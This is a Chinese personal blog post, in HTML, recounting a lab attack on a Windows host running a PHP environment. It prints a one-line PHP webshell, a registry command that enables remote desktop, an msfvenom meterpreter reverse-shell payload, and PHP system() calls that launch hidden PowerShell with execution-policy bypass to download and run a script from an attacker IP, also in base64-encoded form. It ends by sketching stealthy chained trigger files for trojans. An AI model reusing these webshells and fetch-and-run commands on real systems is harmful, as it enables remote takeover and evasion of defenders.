<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="baidu-site-verification" content="L6Lm9d5Crl"/>
  
  
  
  
  <title>用PHP环境调用powershell弹个shell | 大魔王</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="这是一篇奇葩瞎搞文 准备：windows10 PHPv7.3.1 Metasploit">
<meta property="og:type" content="article">
<meta property="og:title" content="用PHP环境调用powershell弹个shell">
<meta property="og:url" content="http://ljg.dropsec.xyz/2020/01/13/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/index.html">
<meta property="og:site_name" content="大魔王">
<meta property="og:description" content="这是一篇奇葩瞎搞文 准备：windows10 PHPv7.3.1 Metasploit">
<meta property="og:image" content="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/%E6%8B%93%E6%89%91%E5%9B%BE.png">
<meta property="og:image" content="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/muma.png">
<meta property="og:image" content="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/3389.png">
<meta property="og:image" content="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/%E6%94%BB%E5%87%BB%E8%BD%BD%E8%8D%B7.png">
<meta property="og:image" content="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/web.png">
<meta property="og:image" content="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/powershell.png">
<meta property="og:image" content="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/%E5%8F%8C%E5%BC%95%E5%8F%B7.png">
<meta property="og:image" content="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/success.png">
<meta property="og:image" content="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/hello.png">
<meta property="og:image" content="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/success1.png">
<meta property="og:image" content="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/fire.png">
<meta property="og:image" content="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/powershellbase64.png">
<meta property="og:image" content="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/duominuo.png">
<meta property="article:published_time" content="2020-01-13T03:38:16.000Z">
<meta property="article:modified_time" content="2020-01-14T03:24:16.609Z">
<meta property="article:author" content="breakonion">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/%E6%8B%93%E6%89%91%E5%9B%BE.png">
  
    <link rel="alternative" href="/atom.xml" title="大魔王" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.png">
  
  
  
<link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet" />
  <script>
      var yiliaConfig = {
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
<meta name="generator" content="Hexo 4.2.0"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <script src="http://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
        <a href="/" class="profilepic">
            
            <img lazy-src="/img/avatar.png" class="js-avatar">
            
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">breakonion</a></h1>
        </hgroup>
        
        <p class="header-subtitle">一切杀不死我的，都使我变得更强</p>
        
        
            <form>
                <input type="text" class="st-default-search-input search" id="local-search-input" placeholder=" Search...">
            </form>
            <div id="local-search-result"></div>
        
        
            <script type="text/javascript">
                (function() {
                    'use strict';
                    function getMatchData(keyword, data) {
                        var matchData = [];
                        for(var i =0;i<data.length;i++){
                            if(data[i].title.toLowerCase().indexOf(keyword)>=0) 
                                matchData.push(data[i])
                        }
                        return matchData;
                    }
                    var $input = $('#local-search-input');
                    var $resultContent = $('#local-search-result');
                    $input.keyup(function(){
                        $.ajax({
                            url: '/search.json',
                            dataType: "json",
                            success: function( json ) {
                                var str='<ul class=\"search-result-list\">';                
                                var keyword = $input.val().trim().toLowerCase();
                                $resultContent.innerHTML = "";
                                if ($input.val().trim().length <= 0) {
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                }
                                var results = getMatchData(keyword, json);
                                if(results.length === 0){
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                } 
                                for(var i =0; i<results.length; i++){
                                    str += "<li><a href='"+ results[i].url +"' class='search-result-title'>"+ results[i].title +"</a></li>";
                                }
                                str += "</ul>";
                                $resultContent.empty();
                                $resultContent.append(str);
                                $('#switch-area').hide();
                            }
                        });
                    });
                })();
            </script>
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        
        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a  href="/archives/">所有文章</a></li>
                        
                            <li><a  href="/categories/know">认知提升</a></li>
                        
                            <li><a  href="/about/">关于我</a></li>
                        
                            <li><a  href="/categories/technology/">搞点事情</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl github"  target="_blank" href="https://github.com/breakonion/breakonion.github.io.git" title="github">github</a>
                            
                                <a class="fl weibo"  target="_blank" href="http://weibo.com/" title="weibo">weibo</a>
                            
                        </ul>
                    </nav>
                </section>
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/SNMP/" style="font-size: 10px;">SNMP</a> <a href="/tags/hello/" style="font-size: 10px;">hello</a> <a href="/tags/openstack/" style="font-size: 20px;">openstack</a> <a href="/tags/pykms/" style="font-size: 10px;">pykms</a> <a href="/tags/windows-server-2012-r2/" style="font-size: 10px;">windows server 2012 r2</a> <a href="/tags/%E6%9D%82%E9%A1%B9/" style="font-size: 10px;">杂项</a> <a href="/tags/%E8%BF%90%E7%BB%B4/" style="font-size: 10px;">运维</a>
                    </div>
                </section>
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://www.zzti.edu.cn">zzti</a>
                    
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">我是大魔王!</div>
                </section>
                
            </div>
        </div>
    </header>
</div>

    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">breakonion</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/avatar.png" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">breakonion</a></h1>
            </hgroup>
            
            <p class="header-subtitle">一切杀不死我的，都使我变得更强</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/categories/know">认知提升</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                    <li><a href="/categories/technology/">搞点事情</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="github" target="_blank" href="https://github.com/breakonion/breakonion.github.io.git" title="github">github</a>
                    
                        <a class="weibo" target="_blank" href="http://weibo.com/" title="weibo">weibo</a>
                    
                </div>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-用PHP环境调用powershell弹个shell" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a  href="/2020/01/13/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/" class="article-date">
      <time datetime="2020-01-13T03:38:16.000Z" itemprop="datePublished">2020-01-13</time>
</a>

    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      用PHP环境调用powershell弹个shell
    </h1>
  


      </header>
      
      <div class="article-info article-info-post">
        

        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>这是一篇奇葩瞎搞文 准备：windows10 PHPv7.3.1 Metasploit</p>
<a id="more"></a>
<p>&lt;The rest of contents | 余下全文&gt;</p>
<h2 id="1、序言"><a href="#1、序言" class="headerlink" title="1、序言"></a>1、序言</h2><p>　　如果说我为什么想起用PHP调用powershell,我想一定是因为我的“盲目自信造成的可怕结果”。总之这是一个很搞笑的经历，花了我很长时间最终证明我是个“fool b”哈哈哈下面我就来书写下这个让我自己都不自觉笑出声的经历。当然故事吗，因为是一个月前的事了，我就能想起多少就写多少，我只要看这篇文的人能在快乐中有自己的想法，当然我在写这篇文的时候我相信对我自己还是会有一些新的想法诞生的。下面就开始“自我反省”。</p>
<h2 id="2、故事第一章–“奇想”"><a href="#2、故事第一章–“奇想”" class="headerlink" title="2、故事第一章–“奇想”"></a>2、故事第一章–“奇想”</h2><p>　　说真的我一直觉得自己很菜，自己平时工作不忙的时候就喜欢自己看点攻防的相关知识。看来看去总是没有新意，都是老套路。大致思路如下，找个漏洞，像命令执行这样的。windows下开个3389，关个防火墙，好吗，各种工具，看着大神们用的各种神器仿佛开了挂一样。但是我觉得这样不好，因为这样不够隐蔽。所以我想在不过多依赖工具的情况下完成打点工作。</p>
<h2 id="3、故事第二章–“剧本”"><a href="#3、故事第二章–“剧本”" class="headerlink" title="3、故事第二章–“剧本”"></a>3、故事第二章–“剧本”</h2><p><img src="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/%E6%8B%93%E6%89%91%E5%9B%BE.png" alt=""><br>　　<br>   目标是一台Windows主机（这一点就很傻），我想要做的事就是远程关闭此主机的防火墙以及用powershell反弹一个shell。暂时先不考虑什么免杀的。当然想执行上面的操作得有个漏洞能够让你插马，这里我就假设已经插马成功了。先别急着吐槽，有人可能觉得都插马成功了，你找个功能强大的大马传上去不就行了。抱歉我知道那很可以，JOJO:但是我拒绝！ 马大了，容易被发现频繁的主动回连也会增加暴露的可能性！与此相反我更喜欢类似于一句话的被动式木马。所以本篇依然从被动式木马开始，反弹的powershell被防守方抓到也无所谓。</p>
<h3 id="①环境配置"><a href="#①环境配置" class="headerlink" title="①环境配置"></a>①环境配置</h3><p>　　1. 启用受害机的PHPstudy环境。</br><br>　　2. 攻击机器带hackbar(能提交POST请求的工具都可以)的firefox </br><br>　　3. 安装有metasploit的PC（这里选了kali linux）</br></p>
<h3 id="②开始排练"><a href="#②开始排练" class="headerlink" title="②开始排练"></a>②开始排练</h3><p>　　1. 武器构建</br><br>　　前边已经说了，我要用PHP环境调用powershell。那么该怎么调用呢？在调用powershell之前，我还希望通过一些远程命令来关掉目标的防火墙。所以我们要逐层突防，不要太急功近利。所以此处先掏出”大杀器”通过特殊处理的一句话木马,让管理员放松警惕，觉得你是个小垃圾。<?php system($_POST["onino"]);?>,虽然它很短，但是我觉得它很容易就被变形和隐藏。参见<a href="https://www.freebuf.com/articles/web/186298.html" target="_blank" rel="noopener" title="无字母和数字的webshell">https://www.freebuf.com/articles/web/186298.html</a>。此处很单纯的一句话和一个hackbar就可以完成数据传输（此处还有提升空间，采取加密通信！）远程开启和关闭windows的防火墙,开启3389端口。<br><img src="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/muma.png" alt=""></p>
<pre><code>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f /*开启3389端口*/</code></pre> 
<p><img src="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/3389.png" alt=""><br>　　以上就是通过简单的命令配合一句话木马达到控制远端受害机器的防火墙、3389端口等策略。接下来就可以采取多种策略和攻击方式做下一步工作。比如远程连接3389，直接手工投毒，哈哈哈 当然这样太无趣又乏味了。 我要按照剧本走，通过浏览器发送指令然后，调用powershell发起无文件攻击。</br><br>　　首先这里先用metasploit生成攻击载荷,并将此攻击载荷放到攻击载荷服务器的WEB目录下。</p>
<pre><code>root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.164.143 LPORT=8888 -f psh-reflection >per.ps1
</code></pre>
<p><img src="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/%E6%94%BB%E5%87%BB%E8%BD%BD%E8%8D%B7.png" alt=""></br><br><img src="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/web.png" alt=""></br><br>　　这时候侦听的环境都已经准备就绪，并且poweshell要执行的恶意载荷也已经具备，那么该怎么样才能将载荷投递到目标主机呢？既然一句话木马能执行系统命令，那么通过cmd来调用powershell进而让powershell从攻击载荷服务器下载恶意脚本per.ps1并执行就可以了。那么就剩下最关键的一步。剧本假设的是php环境，就得按规矩走，要通过powershell来执行。这当然难不倒我，瞬间我就有了主意构建了武器核心。</p>
<pre><code>system('cmd /c powershell.exe -sta -W Hidden -c IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.164.147/per.ps1'))');
</code></pre>
<p>　　这条命令看起来不错，先在本地尝试执行试试。这时候就会面对PHP环境对于单引号以及双引号的闭合的尴尬。下图中的单引号①号和②号闭合了。③号和④号的字符串直接无效。 我所期望的是希望②号和③号先闭合这样powershell这样Downloadstring后面的url才能被当成字符串执行。 当然把①号和④号换成双引号在编译器执行测试是可以反弹shell的。<br><img src="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/powershell.png" alt=""></br></p>
<p><img src="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/%E5%8F%8C%E5%BC%95%E5%8F%B7.png" alt=""></br></p>
<p><img src="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/success.png" alt=""><br></br><br>　　2. 载荷投递</br><br>　　武器构建好了，传到受害机器上，通过浏览器触发试试能不能反弹shell。令人惊讶的是这次竟然莫名奇妙地成功地反弹了shell。我反而开心不起来，因为一个月前我可是从来没有成功过，或许是因为我用的metsploit的问题。<br><img src="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/hello.png" alt=""></br></p>
<p><img src="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/success1.png" alt=""></br><br>　　看到这里你可能会觉得这个家伙真的蠢，哈哈哈。but,我并不会因你快乐的笑声而感到自卑。因为弯路让我得到了更多。 你瞧，虽然上图中访问hello.php服务器返回了500，但是shell依然反弹成功了。(所以说从服务器状态码判断攻击者的成功与否太具有局限性)。多好的弯路啊，除此之外它还使我在不使用双引号的情况下，达到了我新武器的构建。我们来看我的新武器。</br></p>
<pre><code>&lt;?php
 system (&apos;powershell -ep bypass -NoLogo -NonInteractive -sta -W Hidden -NoProfile -enc SQBFAFgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQA2ADQALgAxADQANwAvAHAAZQByAC4AcABzADEAJwApACkA&apos;);
?&gt;</code></pre><p><img src="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/fire.png" alt=""></br></p>
<p>　　嚯又是一个烂大街的代码，哈哈哈。都烂大街了，为什么还要放在这里呢? 因为恰恰是这段代码让人了解到，这个世界上base64编码分两类。 powershell可以执行的，以及powershell的’SQBFAFgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB<br>0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkA<br>MgAuADEANgA4AC4AMQA2ADQALgAxADQANwAvAHAAZQByAC4AcABzADEAJwApACkA’这串字符是通过powershell脚本进行base64加密的。</p>
<pre><code>加密前:
&lt;?php
system (&apos;powershell -ep bypass -NoLogo -NonInteractive -sta -W Hidden -NoProfile -c IEX((New-Object System.Net.WebClient).DownloadString(&apos;http://192.168.164.147/per.ps1&apos;));
?&gt;
加密后：
&lt;?php
system (&apos;powershell -ep bypass -NoLogo -NonInteractive -sta -W Hidden -NoProfile -enc SQBFAFgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQA2ADQALgAxADQANwAvAHAAZQByAC4AcABzADEAJwApACkA&apos;);
?&gt;</code></pre><p>　　这里我想说的是无论你是通过常见的base64工具还是编程输出的base64加密字符串，在powershell里面执行都会报错。正确的途径，当然是采用逆向思维，通过powershell加密字符串就可以了。</p>
<pre><code>powershell-base64:
$fileContent = “所要编码的脚本”
$bytes = [System.Text.Encoding]::Unicode.GetBytes($fileContent)
$encodedCommand = [Convert]::ToBase64String($bytes)
echo $encodedCommand</code></pre><p><img src="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/powershellbase64.png" alt=""><br/><br>　　ops:除此之外，我还找到了另外一个比较有趣的网络攻击思路，有点类似于多米诺骨牌。<br>在我初次遇到单引号问题苦苦不能解决的时候，随着我的调整，我在本地成功执行了脚本并成功反弹了shell。但是当我把文件传到受害机器时却一直失败。我想到了通过post传参数的方式来将’cmd /c powershell.exe -sta -W Hidden -c IEX((New-Object System.Net.WebClient).DownloadString(‘hxxp://192.168.164.147/per.ps1’))’当作参数来执行，结果依然不理想。 我排查了各个环节，最终突然开窍，何必那么纠结于环境。于是我就在上传木马脚本文件之外，还上传了一个触发文件来模仿人输入CMD命令，主动点击执行木马脚本。这样就可以排除环境以及通信问题了。</p>
<p><img src="https://raw.githubusercontent.com/breakonion/image/master/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/duominuo.png" alt=""></br><br>唔~ 写到这里我的心思已经完全不在什么powershell以及php怎么触发等等。 有这样一种木马触发方式    </p>
<pre><code>文件是可以触发的，木马是一些代码。 那么我想会有一种木马，在它真正启动之前会有N个未知的触发文件。这些触发文件每个单体都令人看不懂意图，在最终的木马触发之前人们看不懂它，它们像一个个多米诺骨牌连环被触发，这个过程的时间周期是攻击者可控的可以是几秒钟，一小时甚至几年，但最终不管哪一个被触发都会最终触发最终的木马。ps:代码积木，触发文件自启式拼组木马。 </code></pre><p>　　3. 命令控制<br>　　此处暂且不写，以此为引我将继续探索，将我在路上的趣事不断地写在这里。<br>　<br>######### 5月27 10月5 12月27 &amp;today</p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a  href="/2020/01/13/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/">用PHP环境调用powershell弹个shell</a></p>
        <p><span>文章作者:</span><a  href="/" title="访问 breakonion 的个人博客">breakonion</a></p>
        <p><span>发布时间:</span>2020年01月13日 - 11时38分</p>
        <p><span>最后更新:</span>2020年01月14日 - 11时24分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2020/01/13/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/" title="用PHP环境调用powershell弹个shell">http://ljg.dropsec.xyz/2020/01/13/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/</a>
            <span class="copy-path" data-clipboard-text="原文: http://ljg.dropsec.xyz/2020/01/13/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/　　作者: breakonion" title=""></span>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" target="_blank" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target = "_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a  href="/2020/02/02/web%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          web安全攻防
        
      </div>
    </a>
  
  
    <a  href="/2019/01/02/SNMP%E5%8D%8F%E8%AE%AE%E8%AE%A4%E7%9F%A5/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">SNMP协议认知</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>


  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#1、序言"><span class="toc-number">1.</span> <span class="toc-text">1、序言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2、故事第一章–“奇想”"><span class="toc-number">2.</span> <span class="toc-text">2、故事第一章–“奇想”</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3、故事第二章–“剧本”"><span class="toc-number">3.</span> <span class="toc-text">3、故事第二章–“剧本”</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#①环境配置"><span class="toc-number">3.1.</span> <span class="toc-text">①环境配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#②开始排练"><span class="toc-number">3.2.</span> <span class="toc-text">②开始排练</span></a></li></ol></li></ol>
</div>
<style>
    .left-col .switch-btn {
        display: none;
    }
    .left-col .switch-area {
        display: none;
    }
</style>
<input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

<script src="http://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";
    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
            $(".switch-btn, .switch-area").fadeOut(300);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
            $(".switch-btn, .switch-area").fadeIn(500);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
        $(".switch-btn, .switch-area").show();
    }
</script>




<div class="bdsharebuttonbox">
	<a href="#" class="fx fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
	<a href="#" class="fx fa-weixin bds_weixin" data-cmd="weixin" title="分享到微信"></a>
	<a href="#" class="fx fa-qq bds_sqq" data-cmd="sqq" title="分享到QQ好友"></a>
	<a href="#" class="fx fa-facebook-official bds_fbook" data-cmd="fbook" title="分享到Facebook"></a>
	<a href="#" class="fx fa-twitter bds_twi" data-cmd="twi" title="分享到Twitter"></a>
	<a href="#" class="fx fa-linkedin bds_linkedin" data-cmd="linkedin" title="分享到linkedin"></a>
	<a href="#" class="fx fa-files-o bds_copy" data-cmd="copy" title="分享到复制网址"></a>
</div>
<script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"2","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>




    
        <section class="changyan" id="comments">
  <!--<div id="uyan_frame"></div>-->
  <div id="SOHUCS"></div>
  <script charset="utf-8" type="text/javascript" src="https://changyan.sohu.com/upload/changyan.js"></script>
  <script type="text/javascript">
    window.changyan.api.config({
      appid: 'xxxx',
      conf: 'xxxxxxxxx'
    });
  </script>
</section>
    



    <div class="scroll" id="post-nav-button">
        
            <a  href="/2020/02/02/web%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2/" title="上一篇: web安全攻防">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a  href="/2019/01/02/SNMP%E5%8D%8F%E8%AE%AE%E8%AE%A4%E7%9F%A5/" title="下一篇: SNMP协议认知">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
